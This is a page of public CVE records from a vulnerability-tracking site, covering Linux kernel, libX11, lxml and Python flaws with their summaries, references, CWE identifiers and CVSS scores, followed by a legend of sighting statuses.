"dateUpdated": "2023-12-08T03:06:17.240500", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugs.python.org/issue39421" }, { "name": "[debian-lts-announce] 20230920 [SECURITY] [DLA 3575-1] python2.7 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00022.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230929-0008/" }, { "name": "[debian-lts-announce] 20231011 [SECURITY] [DLA 3614-1] python3.7 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00017.html" }, { "name": "FEDORA-2023-9954dae554", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VO7Y2YZSDK3UYJD2KBGLXRTGNG6T326J/" }, { "name": "FEDORA-2023-34a3a5adba", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JZ5OOBWNYWXFTZDMCGHJVGDLDTHLWITJ/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-48560", "datePublished": "2023-08-22T00:00:00", "dateReserved": "2023-07-23T00:00:00", "dateUpdated": "2024-08-03T15:17:54.823Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1855
Vulnerability from cvelistv5
Published
2023-04-05 00:00
Modified
2024-08-02 06:05
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in xgene_hwmon_remove in drivers/hwmon/xgene-hwmon.c in the Hardware Monitoring Linux Kernel Driver (xgene-hwmon). This flaw could allow a local attacker to crash the system due to a race problem. This vulnerability could even lead to a kernel information leak problem.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:05:26.688Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20230318122758.2140868-1-linux%40roeck-us.net/" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/cb090e64cf25602b9adaf32d5dfc9c8bec493cd1" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel prior to Kernel 6.3 RC3" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in xgene_hwmon_remove in drivers/hwmon/xgene-hwmon.c in the Hardware Monitoring Linux Kernel Driver (xgene-hwmon). This flaw could allow a local attacker to crash the system due to a race problem. This vulnerability could even lead to a kernel information leak problem." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-07-23T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/all/20230318122758.2140868-1-linux%40roeck-us.net/" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "url": "https://github.com/torvalds/linux/commit/cb090e64cf25602b9adaf32d5dfc9c8bec493cd1" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1855", "datePublished": "2023-04-05T00:00:00", "dateReserved": "2023-04-05T00:00:00", "dateUpdated": "2024-08-02T06:05:26.688Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-5717
Vulnerability from cvelistv5
Published
2023-10-25 12:55
Modified
2024-08-02 08:07
Severity ?
EPSS score ?
Summary
Out-of-bounds write in Linux kernel's Linux Kernel Performance Events (perf) component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:07:32.716Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/events?id=32671e3799ca2e4590773fd0e63aaa4229e50c06" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/32671e3799ca2e4590773fd0e63aaa4229e50c06" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.6", "status": "affected", "version": "4.4", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Budimir Markovic" } ], "datePublic": "2023-10-19T08:09:42+00:00", "descriptions": [ { "lang": "en", "value": "A heap out-of-bounds write vulnerability in the Linux kernel\u0027s Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.\n\nIf perf_read_group() is called while an event\u0027s sibling_list is smaller than its child\u0027s sibling_list, it can increment or write to memory locations outside of the allocated buffer.\n\nWe recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "CWE-787 Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-10-25T12:55:06.871Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/events?id=32671e3799ca2e4590773fd0e63aaa4229e50c06" }, { "url": "https://kernel.dance/32671e3799ca2e4590773fd0e63aaa4229e50c06" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Out-of-bounds write in Linux kernel\u0027s Linux Kernel Performance Events (perf) component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-5717", "datePublished": "2023-10-25T12:55:06.871Z", "dateReserved": "2023-10-23T10:49:09.250Z", "dateUpdated": "2024-08-02T08:07:32.716Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-31436
Vulnerability from cvelistv5
Published
2023-04-28 00:00
Modified
2024-10-21 16:01
Severity ?
EPSS score ?
Summary
qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T14:53:30.606Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/3037933448f60f9acb705997eae62013ecb81e0d" }, { "tags": [ "x_transferred" ], "url": "https://www.spinics.net/lists/stable-commits/msg294885.html" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.13" }, { "name": "DSA-5402", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5402" }, { "name": "[debian-lts-announce] 20230605 [SECURITY] [DLA 3446-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00008.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230609-0001/" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/173087/Kernel-Live-Patch-Security-Notice-LSN-0095-1.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/173757/Kernel-Live-Patch-Security-Notice-LSN-0096-1.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" } ], "title": "CVE Program Container" }, { "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-31436", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-10-15T17:15:52.761316Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "CWE-787 Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-21T16:01:13.471Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-29T15:06:30.285764", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/3037933448f60f9acb705997eae62013ecb81e0d" }, { "url": "https://www.spinics.net/lists/stable-commits/msg294885.html" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.13" }, { "name": "DSA-5402", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5402" }, { "name": "[debian-lts-announce] 20230605 [SECURITY] [DLA 3446-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00008.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230609-0001/" }, { "url": "http://packetstormsecurity.com/files/173087/Kernel-Live-Patch-Security-Notice-LSN-0095-1.html" }, { "url": "http://packetstormsecurity.com/files/173757/Kernel-Live-Patch-Security-Notice-LSN-0096-1.html" }, { "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-31436", "datePublished": "2023-04-28T00:00:00", "dateReserved": "2023-04-28T00:00:00", "dateUpdated": "2024-10-21T16:01:13.471Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-19787
Vulnerability from cvelistv5
Published
2018-12-02 10:00
Modified
2024-08-05 11:44
Severity ?
EPSS score ?
Summary
An issue was discovered in lxml before 4.2.5. lxml/html/clean.py in the lxml.html.clean module does not remove javascript: URLs that use escaping, allowing a remote attacker to conduct XSS attacks, as demonstrated by "j a v a s c r i p t:" in Internet Explorer. This is a similar issue to CVE-2014-3146.
References
▼ | URL | Tags |
---|---|---|
https://usn.ubuntu.com/3841-1/ | vendor-advisory, x_refsource_UBUNTU | |
https://lists.debian.org/debian-lts-announce/2018/12/msg00001.html | mailing-list, x_refsource_MLIST | |
https://usn.ubuntu.com/3841-2/ | vendor-advisory, x_refsource_UBUNTU | |
https://github.com/lxml/lxml/commit/6be1d081b49c97cfd7b3fbd934a193b668629109 | x_refsource_MISC | |
https://lists.debian.org/debian-lts-announce/2020/11/msg00044.html | mailing-list, x_refsource_MLIST |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T11:44:20.323Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "USN-3841-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/3841-1/" }, { "name": "[debian-lts-announce] 20181210 [SECURITY] [DLA 1604-1] lxml security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2018/12/msg00001.html" }, { "name": "USN-3841-2", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/3841-2/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/lxml/lxml/commit/6be1d081b49c97cfd7b3fbd934a193b668629109" }, { "name": "[debian-lts-announce] 20201126 [SECURITY] [DLA 2467-1] lxml security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00044.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2018-12-02T00:00:00", "descriptions": [ { "lang": "en", "value": "An issue was discovered in lxml before 4.2.5. lxml/html/clean.py in the lxml.html.clean module does not remove javascript: URLs that use escaping, allowing a remote attacker to conduct XSS attacks, as demonstrated by \"j a v a s c r i p t:\" in Internet Explorer. This is a similar issue to CVE-2014-3146." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-11-26T20:06:05", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "USN-3841-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/3841-1/" }, { "name": "[debian-lts-announce] 20181210 [SECURITY] [DLA 1604-1] lxml security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2018/12/msg00001.html" }, { "name": "USN-3841-2", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/3841-2/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/lxml/lxml/commit/6be1d081b49c97cfd7b3fbd934a193b668629109" }, { "name": "[debian-lts-announce] 20201126 [SECURITY] [DLA 2467-1] lxml security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00044.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2018-19787", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in lxml before 4.2.5. lxml/html/clean.py in the lxml.html.clean module does not remove javascript: URLs that use escaping, allowing a remote attacker to conduct XSS attacks, as demonstrated by \"j a v a s c r i p t:\" in Internet Explorer. This is a similar issue to CVE-2014-3146." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "USN-3841-1", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/3841-1/" }, { "name": "[debian-lts-announce] 20181210 [SECURITY] [DLA 1604-1] lxml security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2018/12/msg00001.html" }, { "name": "USN-3841-2", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/3841-2/" }, { "name": "https://github.com/lxml/lxml/commit/6be1d081b49c97cfd7b3fbd934a193b668629109", "refsource": "MISC", "url": "https://github.com/lxml/lxml/commit/6be1d081b49c97cfd7b3fbd934a193b668629109" }, { "name": "[debian-lts-announce] 20201126 [SECURITY] [DLA 2467-1] lxml security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00044.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2018-19787", "datePublished": "2018-12-02T10:00:00", "dateReserved": "2018-12-02T00:00:00", "dateUpdated": "2024-08-05T11:44:20.323Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1382
Vulnerability from cvelistv5
Published
2023-04-19 00:00
Modified
2024-08-02 05:49
Severity ?
EPSS score ?
Summary
A data race flaw was found in the Linux kernel, between where con is allocated and con->sock is set. This issue leads to a NULL pointer dereference when accessing con->sock->sk in net/tipc/topsrv.c in the tipc protocol in the Linux kernel.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:49:10.354Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/netdev/bc7bd3183f1c275c820690fc65b708238fe9e38e.1668807842.git.lucien.xin%40gmail.com/T/#u" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux Kernel prior to Kernel 6.1 RC7" } ] } ], "descriptions": [ { "lang": "en", "value": "A data race flaw was found in the Linux kernel, between where con is allocated and con-\u003esock is set. This issue leads to a NULL pointer dereference when accessing con-\u003esock-\u003esk in net/tipc/topsrv.c in the tipc protocol in the Linux kernel." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-19T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/netdev/bc7bd3183f1c275c820690fc65b708238fe9e38e.1668807842.git.lucien.xin%40gmail.com/T/#u" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1382", "datePublished": "2023-04-19T00:00:00", "dateReserved": "2023-03-14T00:00:00", "dateUpdated": "2024-08-02T05:49:10.354Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3138
Vulnerability from cvelistv5
Published
2023-06-28 00:00
Modified
2024-08-02 06:48
Severity ?
EPSS score ?
Summary
A vulnerability was found in libX11. The security flaw occurs because the functions in src/InitExt.c in libX11 do not check that the values provided for the Request, Event, or Error IDs are within the bounds of the arrays that those functions write to, using those IDs as array indexes. They trust that they were called with values provided by an Xserver adhering to the bounds specified in the X11 protocol, as all X servers provided by X.Org do. As the protocol only specifies a single byte for these values, an out-of-bounds value provided by a malicious server (or a malicious proxy-in-the-middle) can only overwrite other portions of the Display structure and not write outside the bounds of the Display structure itself, possibly causing the client to crash with this memory corruption.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:48:07.359Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-3138" }, { "tags": [ "x_transferred" ], "url": "https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/304a654a0d57bf0f00d8998185f0360332cfa36c" }, { "tags": [ "x_transferred" ], "url": "https://lists.x.org/archives/xorg-announce/2023-June/003406.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.x.org/archives/xorg-announce/2023-June/003407.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231208-0008/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "libX11", "vendor": "n/a", "versions": [ { "status": "affected", "version": "libX11 1.8.6" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in libX11. The security flaw occurs because the functions in src/InitExt.c in libX11 do not check that the values provided for the Request, Event, or Error IDs are within the bounds of the arrays that those functions write to, using those IDs as array indexes. They trust that they were called with values provided by an Xserver adhering to the bounds specified in the X11 protocol, as all X servers provided by X.Org do. As the protocol only specifies a single byte for these values, an out-of-bounds value provided by a malicious server (or a malicious proxy-in-the-middle) can only overwrite other portions of the Display structure and not write outside the bounds of the Display structure itself, possibly causing the client to crash with this memory corruption." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-08T19:06:17.298140", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://access.redhat.com/security/cve/CVE-2023-3138" }, { "url": "https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/304a654a0d57bf0f00d8998185f0360332cfa36c" }, { "url": "https://lists.x.org/archives/xorg-announce/2023-June/003406.html" }, { "url": "https://lists.x.org/archives/xorg-announce/2023-June/003407.html" }, { "url": "https://security.netapp.com/advisory/ntap-20231208-0008/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-3138", "datePublished": "2023-06-28T00:00:00", "dateReserved": "2023-06-07T00:00:00", "dateUpdated": "2024-08-02T06:48:07.359Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
Loading...
Loading...
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.